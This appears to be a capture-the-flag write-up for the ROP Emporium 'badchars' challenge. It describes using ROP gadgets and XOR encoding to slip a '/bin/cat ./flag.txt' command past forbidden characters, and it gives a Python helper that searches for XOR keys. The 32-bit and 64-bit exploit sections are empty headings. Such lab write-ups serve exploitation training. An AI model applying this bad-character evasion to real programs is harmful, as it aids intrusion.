badchars

Analysis

So in this case we have a binary as usual with input which overflows and get us the control for EIP (We wont' be discussing the getting offset part, as that has been discussed multiple times in the previous write-ups). However, in this case, there are certain characters that we can not input, else the binary won't run and will stop the execution in the middle.

$ ./badchars 
badchars by ROP Emporium
64bits

badchars are: b i c / <space> f n s
>

So we can not input many essential characters that we usually do to read the flag.txt file of the system. So in this case, the hint was to use XOR function to load our XORed string into memory as done in write4 and then XOR it again to get the original string back, thus avoiding any bad characters while proving input to the program.

So the procedure we'll follow will be to first load the XORed string into memory using gadgets, then XOR the string again with gadgets to get the desired string back and then call system with parameters to get the flag.

I created a helper script to get all the characters that can be used to XOR the string that won't contain the bad characters even after being XORed.

import string

badchars = [" ", "b", "i", "c", "/", "f", "n", "s"]
flag_text = "/bin/cat ./flag.txt;"

all_letters = set(string.ascii_letters).union(set(string.punctuation)) 
valid_xor = all_letters - set(badchars)

for val in valid_xor:
	sample = ''.join([chr(ord(ch) ^ ord(val)) for ch in flag_text])
	if not set(sample).intersection(set(badchars)):
		print "XOR value = ", val

32 bit

64 bit

Previouswrite4Nextfluff

Last updated

Was this helpful?